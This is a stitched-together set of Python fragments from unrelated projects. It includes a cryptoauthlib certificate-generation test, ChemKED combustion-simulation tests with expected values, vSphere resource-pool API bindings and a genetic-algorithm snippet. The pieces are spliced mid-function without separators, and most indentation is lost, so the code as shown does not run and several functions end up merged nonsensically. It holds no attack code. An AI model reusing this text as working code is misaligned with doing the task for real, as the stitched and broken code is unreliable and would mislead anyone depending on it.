enc_dates[0] = (enc_dates[0] & 0x07) | ((((builder._not_valid_before.year - 2000) & 0x1F) << 3) & 0xFF)
enc_dates[0] = (enc_dates[0] & 0xF8) | ((((builder._not_valid_before.month) & 0x0F) >> 1) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0x7F) | ((((builder._not_valid_before.month) & 0x0F) << 7) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0x83) | (((builder._not_valid_before.day & 0x1F) << 2) & 0xFF)
enc_dates[1] = (enc_dates[1] & 0xFC) | (((builder._not_valid_before.hour & 0x1F) >> 3) & 0xFF)
enc_dates[2] = (enc_dates[2] & 0x1F) | (((builder._not_valid_before.hour & 0x1F) << 5) & 0xFF)
enc_dates[2] = (enc_dates[2] & 0xE0) | ((expire_years & 0x1F) & 0xFF)
enc_dates = bytes(enc_dates)
    # SHA256 hash of the public key and encoded dates
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(pubkey)
digest.update(enc_dates)
raw_sn = bytearray(digest.finalize()[:size])
raw_sn[0] = raw_sn[0] & 0x7F # Force MSB bit to 0 to ensure positive integer
raw_sn[0] = raw_sn[0] | 0x40 # Force next bit to 1 to ensure the integer won't be trimmed in ASN.1 DER encoding
try:
return int.from_bytes(raw_sn, byteorder='big', signed=False)
except AttributeError:
return int(binascii.hexlify(raw_sn), 16)
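# Worked example of the date packing above (added for clarity, not in the
# original test): for a not_valid_before of 2017-07-10 20:00 UTC and
# expire_years == 0, the three encoded-date bytes evaluate to
#   enc_dates[0] = ((2017 - 2000) << 3) | (7 >> 1)         = 0x8B
#   enc_dates[1] = ((7 & 1) << 7) | (10 << 2) | (20 >> 3)  = 0xAA
#   enc_dates[2] = ((20 & 0x1F) << 5) | (0 & 0x1F)         = 0x80
# i.e. year-2000 (5 bits), month (4), day (5), hour (5) and expire_years (5)
# packed into 3 bytes, which are then hashed together with the public key.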
def create_device_cert(cert_def):
# Load device public key
public_key = bytearray(64)
assert Status.ATCA_SUCCESS == atcab_get_pubkey(cert_def.public_key_dev_loc.slot, public_key)
    # Convert the key to PEM format
public_key_pem = bytearray.fromhex('3059301306072A8648CE3D020106082A8648CE3D03010703420004') + public_key
public_key_pem = '-----BEGIN PUBLIC KEY-----\n' + base64.b64encode(public_key_pem).decode('ascii') + '\n-----END PUBLIC KEY-----'
# Convert the key into the cryptography format
public_key = serialization.load_pem_public_key(public_key_pem.encode('ascii'), default_backend())
# Create the private key
signer_private_key = ec.generate_private_key(ec.SECP256R1(), default_backend())
signer_public_key = signer_private_key.public_key()
# Create the certificate builder
builder = x509.CertificateBuilder()
# Ordinarily we'd construct a signer cert first, but we'll skip that and just create the fields we need
builder = builder.issuer_name(x509.Name([
x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, u'Example Inc'),
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, u'Example Signer FFFF')]))
# Device cert must have minutes and seconds set to 0
builder = builder.not_valid_before(datetime.now(tz=pytz.utc).replace(minute=0, second=0))
# Should be year 9999, but this doesn't work on windows
builder = builder.not_valid_after(datetime(3000, 12, 31, 23, 59, 59))
builder = builder.subject_name(x509.Name([
x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, u'Example Inc'),
x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, u'Example Device')]))
builder = builder.public_key(public_key)
# Device certificate is generated from certificate dates and public key
builder = builder.serial_number(device_cert_sn(16, builder))
# Subject Key ID is used as the thing name and MQTT client ID and is required for this demo
builder = builder.add_extension(
x509.SubjectKeyIdentifier.from_public_key(public_key),
critical=False)
# Add the authority key id from the signer key
builder = builder.add_extension(
x509.AuthorityKeyIdentifier.from_issuer_public_key(signer_public_key),
critical=False)
# Sign certificate
device_cert = builder.sign(private_key=signer_private_key, algorithm=hashes.SHA256(), backend=default_backend())
# Get the certificate bytes
device_cert_bytes = device_cert.public_bytes(encoding=serialization.Encoding.DER)
# Convert the signer public key into the uncompressed numbers format
signer_public_key_bytes = pubnums_to_bytes(signer_public_key.public_numbers())
return device_cert_bytes, signer_public_key_bytes
@pytest.fixture
def test_atcacert_init():
"""
Run tests against the library mock
"""
load_cryptoauthlib(atcab_mock())
@pytest.fixture
def test_atcacert_init_lib(test_init_with_lib):
"""
Run tests against a built library on the platform
"""
load_cryptoauthlib()
@pytest.fixture
def test_atcacert_init_live(test_init_with_device):
"""
Use real hardware for these tests - otherwise skip
"""
load_cryptoauthlib()
if Status.ATCA_SUCCESS != atcab_init(cfg_ateccx08a_kithid_default()):
raise Exception('Unable to connect to a device')
@pytest.mark.parametrize("struct_name", [
pytest.param('atcacert_device_loc_t'),
pytest.param('atcacert_cert_loc_t'),
pytest.param('atcacert_cert_element_t'),
pytest.param('atcacert_def_t'),
pytest.param('atcacert_tm_utc_t')
])
def test_atcacert_struct_sizes(test_atcacert_init_lib, struct_name):
assert sizeof(eval(struct_name)) == get_size_by_name(struct_name)
# --------------------ATCACERT_DEF----------------------
def test_atcacert_get_response(test_atcacert_init):
device_private_key_slot = 1
challenge = bytearray(32)
response = bytearray(64)
assert atcacert_get_response(device_private_key_slot, challenge, response) == CertStatus.ATCACERT_E_SUCCESS
assert response == bytearray(atcab_mock.r_response)
def test_atcacert_read_cert(test_atcacert_init):
cert_def = atcacert_def_t()
ca_public_key = bytearray(64)
cert = bytearray(65)
cert_size = AtcaReference(len(cert))
assert atcacert_read_cert(cert_def, ca_public_key, cert, cert_size) == CertStatus.ATCACERT_E_SUCCESS
assert cert == bytearray(atcab_mock.r_cert)
assert cert_size.value == atcab_mock.r_cert_size.value
def test_atcacert_write_cert(test_atcacert_init):
cert_def = atcacert_def_t()
cert = bytearray(64)
cert_size = 64
assert atcacert_write_cert(cert_def, cert, cert_size) == CertStatus.ATCACERT_E_SUCCESS
def test_atcacert_create_csr(test_atcacert_init):
        filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
properties.datapoints[0].ignition_type['target'] = 'temperature'
properties.datapoints[1].ignition_type['target'] = 'temperature'
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
        SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
# Only thing different from last test: ignition target is temperature
assert sim.properties.ignition_target == 'temperature'
sim = simulations[1]
sim.setup_case(mechanism_filename, SPEC_KEY)
# Only thing different from last test: ignition target is temperature
assert sim.properties.ignition_target == 'temperature'
def test_shock_tube_pressure_rise_setup_case(self):
"""Test that shock tube case with pressure rise is set up properly.
"""
file_path = os.path.join('testfile_st2.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
assert len(simulations) == 1
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
init_temp = 1264.2
init_pres = 2.18 * ct.one_atm
gas = ct.Solution(mechanism_filename)
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
assert sim.apparatus == 'shock tube'
assert np.allclose(sim.time_end, 2.9157e-2)
assert np.allclose(sim.gas.T, init_temp)
assert np.allclose(sim.gas.P, init_pres)
mass_fracs = np.zeros(sim.gas.n_species)
mass_fracs[sim.gas.species_index(SPEC_KEY['H2'])] = 0.00444
mass_fracs[sim.gas.species_index(SPEC_KEY['O2'])] = 0.00556
mass_fracs[sim.gas.species_index(SPEC_KEY['Ar'])] = 0.99
assert np.allclose(sim.gas.X, mass_fracs)
assert sim.n_vars == gas.n_species + 3
# Check constructed velocity profile
[times, volumes] = simulation.create_volume_history(
mechanism_filename, init_temp, init_pres,
'H2:0.00444,O2:0.00566,AR:0.9899',
0.10 * 1000., sim.time_end
)
volumes = volumes / volumes[0]
dVdt = simulation.first_derivative(times, volumes)
velocities = np.zeros(times.size)
for i, time in enumerate(times):
velocities[i] = sim.reac.walls[0].vdot(time)
assert np.allclose(dVdt, velocities, rtol=1e-3)
def test_rcm_setup_case(self):
"""Test that RCM case is set up properly.
"""
file_path = os.path.join('testfile_rcm.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
assert len(simulations) == 1
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
gas = ct.Solution(mechanism_filename)
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
assert sim.apparatus == 'rapid compression machine'
assert np.allclose(sim.time_end, 0.1)
assert np.allclose(sim.gas.T, 297.4)
assert np.allclose(sim.gas.P, 127722.83)
mass_fracs = np.zeros(sim.gas.n_species)
mass_fracs[sim.gas.species_index(SPEC_KEY['H2'])] = 0.12500
mass_fracs[sim.gas.species_index(SPEC_KEY['O2'])] = 0.06250
mass_fracs[sim.gas.species_index(SPEC_KEY['N2'])] = 0.18125
mass_fracs[sim.gas.species_index(SPEC_KEY['Ar'])] = 0.63125
assert np.allclose(sim.gas.X, mass_fracs)
times = np.arange(0, 9.7e-2, 1.e-3)
volumes = np.array([
5.47669375000E+002, 5.46608789894E+002, 5.43427034574E+002,
5.38124109043E+002, 5.30700013298E+002, 5.21154747340E+002,
5.09488311170E+002, 4.95700704787E+002, 4.79791928191E+002,
4.61761981383E+002, 4.41610864362E+002, 4.20399162234E+002,
3.99187460106E+002, 3.77975757979E+002, 3.56764055851E+002,
3.35552353723E+002, 3.14340651596E+002, 2.93128949468E+002,
2.71917247340E+002, 2.50705545213E+002, 2.29493843085E+002,
2.08282140957E+002, 1.87070438830E+002, 1.65858736702E+002,
1.44647034574E+002, 1.23435332447E+002, 1.02223630319E+002,
8.10119281915E+001, 6.33355097518E+001, 5.27296586879E+001,
4.91943750000E+001, 4.97137623933E+001, 5.02063762048E+001,
5.06454851923E+001, 5.10218564529E+001, 5.13374097598E+001,
5.16004693977E+001, 5.18223244382E+001, 5.20148449242E+001,
5.21889350372E+001, 5.23536351113E+001, 5.25157124459E+001,
5.26796063730E+001, 5.28476160610E+001, 5.30202402028E+001,
5.31965961563E+001, 5.33748623839E+001, 5.35527022996E+001,
5.37276399831E+001, 5.38973687732E+001, 5.40599826225E+001,
5.42141273988E+001, 5.43590751578E+001, 5.44947289126E+001,
5.46215686913E+001, 5.47405518236E+001, 5.48529815402E+001,
5.49603582190E+001, 5.50642270863E+001, 5.51660349836E+001,
5.52670070646E+001, 5.53680520985E+001, 5.54697025392E+001,
5.55720927915E+001, 5.56749762728E+001, 5.57777790517E+001,
5.58796851466E+001, 5.59797461155E+001, 5.60770054561E+001,
5.61706266985E+001, 5.62600130036E+001, 5.63449057053E+001,
5.64254496625E+001, 5.65022146282E+001, 5.65761642150E+001,
5.66485675508E+001, 5.67208534842E+001, 5.67944133373E+001,
5.68703658198E+001, 5.69493069272E+001, 5.70310785669E+001,
5.71146023893E+001, 5.71978399741E+001, 5.72779572372E+001,
5.73517897984E+001, 5.74167271960E+001, 5.74721573687E+001,
5.75216388520E+001, 5.75759967785E+001, 5.76575701358E+001,
5.78058719368E+001, 5.80849611077E+001, 5.85928651155E+001,
5.94734357453E+001, 6.09310671165E+001, 6.32487551103E+001,
6.68100309742E+001
])
volumes = volumes / volumes[0]
dVdt = simulation.first_derivative(times, volumes)
velocities = np.zeros(times.size)
for i, time in enumerate(times):
velocities[i] = sim.reac.walls[0].vdot(time)
assert np.allclose(dVdt, velocities)
assert sim.n_vars == gas.n_species + 3
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_shock_tube_run_cases(self):
"""Test that shock tube cases run correctly.
"""
        # Read experiment YAML file
file_path = os.path.join('testfile_st.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 4.7154e-2
temp = 1250.440275095967
pres = 235715.78371450436
mass_fracs = np.array([
3.78280811e-09, 6.55635749e-11, 3.88632912e-08,
2.68924922e-03, 9.14481216e-07, 2.01249201e-03,
7.30336393e-09, 4.48899838e-10, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
sim = simulations[1]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 4.4803e-2
temp = 1250.9289794273782
pres = 235708.7300698561
mass_fracs = np.array([
4.09616997e-09, 7.26607683e-11, 4.16076690e-08,
2.68923307e-03, 9.47551606e-07, 2.01247148e-03,
7.82886351e-09, 4.77404824e-10, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_shock_tube_pressure_rise_run_cases(self):
"""Test that shock tube cases with pressure rise run correctly.
"""
        # Read experiment YAML file
file_path = os.path.join('testfile_st2.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 2.9157e-2
temp = 2305.9275837885516
pres = 915452.1978990212
mass_fracs = np.array([
2.55673782e-06, 5.70019832e-07, 3.73361152e-05,
2.61559579e-03, 1.30748753e-04, 1.91579133e-03,
1.04724319e-07, 2.70985419e-09, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_rcm_run_cases(self):
"""Test that RCM case runs correctly.
"""
        # Read experiment YAML file
file_path = os.path.join('testfile_rcm.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 1.0e-1
temp = 2385.3726323703772
pres = 7785283.273098443
mass_fracs = np.array([
1.20958787e-04, 2.24531172e-06, 1.00369447e-05,
5.22700388e-04, 4.28382158e-04, 6.78623202e-02,
4.00112919e-07, 1.46544920e-07, 1.20831350e-32,
3.89605241e-34, -3.39400724e-33, -2.46590209e-34,
-1.74786488e-31, -5.36410698e-31, 4.72585636e-27,
7.94725956e-26, 5.20640355e-33, 2.16633481e-32,
2.74982659e-34, 5.20547210e-35, 5.96795929e-33,
-2.98353670e-48, -1.16084981e-45, -2.33518734e-48,
-6.38881605e-47, -3.09502377e-48, -8.14011410e-48,
-6.95137295e-47, -8.71647858e-47, -3.34677877e-46,
2.05479180e-09, 1.59879068e-09, 2.45613053e-09,
2.06962550e-08, 2.82124731e-09, 4.55692132e-04,
3.22230699e-07, 1.49833621e-07, 5.93547268e-08,
-2.74353105e-33, -1.17993222e-30, -5.51437143e-36,
-9.13974801e-37, -1.97028722e-31, -9.69084296e-32,
-1.31976752e-30, -2.12060990e-32, 1.55792718e-01,
7.74803838e-01, 2.72630502e-66, 2.88273784e-67,
-2.18774836e-50, -1.47465442e-48
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp,
rtol=1e-5, atol=1e-9
)
assert np.allclose(table.col('pressure')[-1], pres,
rtol=1e-5, atol=1e-9
)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-4, atol=1e-8
)
# TODO: add test for restart option
def test_capitalization_species_target(self):
"""Test that species targets with capitalization not matching model works.
"""
file_path = os.path.join('testfile_st2.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# ignition target is OH
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
file_path = os.path.join('h2o2-lowercase.cti')
mechanism_filename = pkg_resources.resource_filename(__name__, file_path)
SPEC_KEY = {'H2': 'h2', 'O2': 'o2', 'N2': 'n2', 'Ar': 'ar'}
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
# oh is species index 4
assert sim.properties.ignition_target == 4
# now try for uppercase in model and lowercase in file.
properties = ChemKED(filename, skip_validation=True)
properties.datapoints[0].ignition_type['target'] = 'oh'
        SPEC_KEY
In a resource pool with an expandable reservation, the reservation
can grow beyond the specified value, if the parent resource pool
has unreserved resources. A non-expandable reservation is called a
fixed reservation. This attribute was added in vSphere API 7.0.0.
:type limit: :class:`long`
:param limit: The utilization of a resource pool will not exceed this limit, even
if there are available resources. This is typically used to ensure
a consistent performance of resource pools independent of available
resources. If set to -1, then there is no fixed limit on resource
usage (only bounded by available resources and shares). Units are
MB for memory, and MHz for CPU. This attribute was added in vSphere
API 7.0.0.
:type shares: :class:`ResourcePool.SharesInfo`
:param shares: Shares are used in case of resource contention. This attribute was
added in vSphere API 7.0.0.
"""
self.reservation = reservation
self.expandable_reservation = expandable_reservation
self.limit = limit
self.shares = shares
VapiStruct.__init__(self)
ResourceAllocationInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.resource_allocation_info', {
'reservation': type.IntegerType(),
'expandable_reservation': type.BooleanType(),
'limit': type.IntegerType(),
'shares': type.ReferenceType(__name__, 'ResourcePool.SharesInfo'),
},
ResourceAllocationInfo,
False,
None))
class Info(VapiStruct):
"""
The ``ResourcePool.Info`` class contains information about a resource pool.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
resource_pools=None,
cpu_allocation=None,
memory_allocation=None,
):
"""
:type name: :class:`str`
:param name: Name of the vCenter Server resource pool.
:type resource_pools: :class:`set` of :class:`str`
:param resource_pools: Identifiers of the child resource pools contained in this resource
pool.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
:type cpu_allocation: :class:`ResourcePool.ResourceAllocationInfo`
:param cpu_allocation: Resource allocation information for CPU. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type memory_allocation: :class:`ResourcePool.ResourceAllocationInfo`
:param memory_allocation: Resource allocation information for memory. This attribute was
added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.name = name
self.resource_pools = resource_pools
self.cpu_allocation = cpu_allocation
self.memory_allocation = memory_allocation
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.info', {
'name': type.StringType(),
'resource_pools': type.SetType(type.IdType()),
'cpu_allocation': type.OptionalType(type.ReferenceType(__name__, 'ResourcePool.ResourceAllocationInfo')),
'memory_allocation': type.OptionalType(type.ReferenceType(__name__, 'ResourcePool.ResourceAllocationInfo')),
},
Info,
False,
None))
class FilterSpec(VapiStruct):
"""
The ``ResourcePool.FilterSpec`` class contains attributes used to filter
the results when listing resource pools (see :func:`ResourcePool.list`). If
multiple attributes are specified, only resource pools matching all of the
attributes match the filter.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
resource_pools=None,
names=None,
parent_resource_pools=None,
datacenters=None,
hosts=None,
clusters=None,
):
"""
:type resource_pools: :class:`set` of :class:`str` or ``None``
:param resource_pools: Identifiers of resource pools that can match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
If None or empty, resource pools with any identifier match the
filter.
:type names: :class:`set` of :class:`str` or ``None``
:param names: Names that resource pools must have to match the filter (see
:attr:`ResourcePool.Info.name`).
If None or empty, resource pools with any name match the filter.
:type parent_resource_pools: :class:`set` of :class:`str` or ``None``
:param parent_resource_pools: Resource pools that must contain the resource pool for the resource
pool to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
If None or empty, resource pools in any resource pool match the
filter.
:type datacenters: :class:`set` of :class:`str` or ``None``
:param datacenters: Datacenters that must contain the resource pool for the resource
pool to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``Datacenter``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``Datacenter``.
If None or empty, resource pools in any datacenter match the
filter.
:type hosts: :class:`set` of :class:`str` or ``None``
:param hosts: Hosts that must contain the resource pool for the resource pool to
match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``HostSystem``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``HostSystem``.
If None or empty, resource pools in any host match the filter.
:type clusters: :class:`set` of :class:`str` or ``None``
:param clusters: Clusters that must contain the resource pool for the resource pool
to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ClusterComputeResource``. When methods return a value of this
class as a return value, the attribute will contain identifiers for
the resource type: ``ClusterComputeResource``.
If None or empty, resource pools in any cluster match the filter.
"""
self.resource_pools = resource_pools
self.names = names
self.parent_resource_pools = parent_resource_pools
self.datacenters = datacenters
self.hosts = hosts
self.clusters = clusters
VapiStruct.__init__(self)
FilterSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.filter_spec', {
'resource_pools': type.OptionalType(type.SetType(type.IdType())),
'names': type.OptionalType(type.SetType(type.StringType())),
'parent_resource_pools': type.OptionalType(type.SetType(type.IdType())),
'datacenters': type.OptionalType(type.SetType(type.IdType())),
'hosts': type.OptionalType(type.SetType(type.IdType())),
'clusters': type.OptionalType(type.SetType(type.IdType())),
},
FilterSpec,
False,
None))
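    # Hedged usage sketch (not part of the generated bindings): a filter that
    # matches resource pools named 'dev-pool' inside one datacenter. How the
    # stub object exposing ResourcePool.list() is obtained is not shown here,
    # and 'datacenter-2' is a placeholder identifier.
    #
    #   spec = ResourcePool.FilterSpec(names={'dev-pool'},
    #                                  datacenters={'datacenter-2'})
    #   summaries = resource_pool_stub.list(spec)  # list of ResourcePool.Summary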
class Summary(VapiStruct):
"""
The ``ResourcePool.Summary`` class contains commonly used information about
a resource pool in vCenter Server.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
resource_pool=None,
name=None,
):
"""
:type resource_pool: :class:`str`
:param resource_pool: Identifier of the resource pool.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will be an identifier for the resource
type: ``ResourcePool``.
:type name: :class:`str`
:param name: Name of the resource pool.
"""
self.resource_pool = resource_pool
self.name = name
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.summary', {
'resource_pool': type.IdType(resource_types='ResourcePool'),
'name': type.StringType(),
},
Summary,
False,
None))
class ResourceAllocationCreateSpec(VapiStruct):
"""
The ``ResourcePool.ResourceAllocationCreateSpec`` class contains resource
allocation information used to create a resource pool, see
:func:`ResourcePool.create`. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
reservation=None,
expandable_reservation=None,
limit=None,
shares=None,
):
"""
:type reservation: :class:`long` or ``None``
:param reservation: Amount of resource that is guaranteed available to a resource pool.
Reserved resources are not wasted if they are not used. If the
utilization is less than the reservation, the resources can be
            utilized by other running virtual machines. Units are MB for memory,
and MHz for CPU. This attribute was added in vSphere API 7.0.0.
If None or empty,
:attr:`ResourcePool.ResourceAllocationCreateSpec.reservation` will
be set to 0.
:type expandable_reservation: :class:`bool` or ``None``
:param expandable_reservation: In a resource pool with an expandable reservation, the reservation
can grow beyond the specified value, if the parent resource pool
has unreserved resources. A non-expandable reservation is called a
fixed reservation. This attribute was added in vSphere API 7.0.0.
If None or empty,
:attr:`ResourcePool.ResourceAllocationCreateSpec.expandable_reservation`
will be set to true.
:type limit: :class:`long` or ``None``
:param limit: The utilization of a resource pool will not exceed this limit, even
if there are available resources. This is typically used to ensure
a consistent performance of resource pools independent of available
resources. If set to -1, then there is no fixed limit on resource
usage (only bounded by available resources and shares). Units are
MB for memory, and MHz for CPU. This attribute was added in vSphere
API 7.0.0.
If None or empty,
            :attr:`ResourcePool.ResourceAllocationCreateSpec.limit` will be set to -1.
t1-t0, g+1))
# If this is the first generation and we're tracking a baseline,
# save the requisite information.
if (g == 0) and (self.baselineIndex is not None):
# Get a reference to the individual
bInd = self.individualsList[self.baselineIndex]
                # Clear the index (the individual will get sorted)
self.baselineIndex = None
# Save information.
self.baselineData = {'costs': copy.deepcopy(bInd.costs),
